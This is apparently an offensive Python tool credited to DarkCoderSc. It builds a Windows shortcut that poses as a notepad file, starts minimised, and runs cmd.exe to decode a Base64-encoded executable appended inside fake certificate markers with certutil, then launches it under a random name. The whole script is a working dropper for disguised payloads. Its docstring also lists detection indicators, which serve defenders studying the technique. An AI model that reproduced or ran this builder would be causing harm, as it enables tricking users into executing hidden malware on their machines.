#!/usr/bin/env python3
# Jean-Pierre LESUEUR (@DarkCoderSc)
# https://keybase.io/phrozen
# Requirements:
# -> pip install pypiwin32
# -> pip install winshell
import argparse
import base64
import os
import pathlib
import random
import string
import winshell
def build_shortcut(file_to_embed, shortcut_name):
    """Write ``<shortcut_name>.lnk`` next to this script with a file appended to it.

    The shortcut targets ``%COMSPEC%`` with a ``/c`` command line that runs
    ``certutil -decode`` over every ``*.lnk`` it matches and then starts the
    decoded ``.exe``. The bytes of *file_to_embed* are Base64-encoded and
    appended to the ``.lnk`` between PEM certificate markers.

    Artefacts visible in the code below that detection and triage can key on:

    * a ``.lnk`` whose target is the command interpreter while its icon is
      notepad.exe under ``%windir%``, with the window set to start minimised;
    * a ``.lnk`` carrying data appended after the shortcut itself, beginning
      with ``-----BEGIN CERTIFICATE-----`` and ending with
      ``-----END CERTIFICATE-----``, so the file is far larger than a normal
      shortcut;
    * ``cmd.exe /c`` spawning ``certutil -decode`` with a ``.lnk`` as input,
      followed by the start of a newly written ``.exe`` whose name is eight
      random ASCII letters.

    Args:
        file_to_embed: Path of the file whose bytes are appended to the shortcut.
        shortcut_name: Base name of the shortcut; ``.lnk`` is appended.
    """
    # Joining with "" leaves the script directory ending in a path separator,
    # so the name can simply be concatenated onto it.
    script_dir = os.path.join(pathlib.Path(__file__).parent.resolve(), "")
    output_shortcut = "{}{}.lnk".format(script_dir, shortcut_name)

    # Name of the decoded file: eight letters drawn from string.ascii_letters,
    # so a fixed file-name indicator will not match across generated shortcuts.
    decoded_stem = "".join([random.choice(string.ascii_letters) for _ in range(8)])

    # Command line the shortcut runs: decode each *.lnk with certutil into
    # <decoded_stem>.exe, then start that file.
    payload = "@echo off&(for %i in (*.lnk) do certutil -decode %i {0}.exe)&start {0}.exe".format(
        decoded_stem
    )

    # NOTE(review): winshell presumably persists the shortcut when this block
    # exits; the append further down relies on the file being in place by then.
    with winshell.shortcut(output_shortcut) as lnk:
        lnk.description = ""
        lnk.show_cmd = "min"
        lnk.working_directory = ""
        lnk.path = "%COMSPEC%"
        # The quote opened after /c is never closed; process command-line
        # logging would show the arguments in exactly this form.
        lnk.arguments = "/c \"{}".format(payload)
        lnk.icon_location = ("%windir%\\notepad.exe", 0)

    with open(file_to_embed, "rb") as source_file:
        encoded_content = base64.b64encode(source_file.read())

    # Appended in "ab" mode, i.e. after whatever the shortcut file already
    # holds; markers and Base64 body are written back to back with no newlines.
    appended_blob = b"".join(
        (
            b"-----BEGIN CERTIFICATE-----",
            encoded_content,
            b"-----END CERTIFICATE-----",
        )
    )
    with open(output_shortcut, "ab") as lnk_file:
        lnk_file.write(appended_blob)

    print("[+] Shortcut generated: \"{}\"".format(output_shortcut))
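if __name__ == "__main__":
    # Command-line entry point: parse the two required options and hand them
    # to build_shortcut().
    parser = argparse.ArgumentParser(
        description="Create Windows Shortcut with Self-Extracting Embedded File."
    )

    parser.add_argument(
        "-f",
        "--embed-file",
        type=str,
        dest="embed_file",
        required=True,
        help="File to inject in shortcut.",
    )

    # The long option is spelled "--shorcut-name" in the tool as published;
    # the spelling is kept so existing invocations continue to work.
    parser.add_argument(
        "-n",
        "--shorcut-name",
        type=str,
        dest="shortcut_name",
        required=True,
        help="Generated shortcut name.",
    )

    try:
        argv = parser.parse_args()
    except IOError as e:
        # ArgumentParser.error() requires a message; calling it with no
        # argument raised TypeError and hid the original I/O error.
        parser.error(str(e))

    build_shortcut(argv.embed_file, argv.shortcut_name)

    print("[+] Done.")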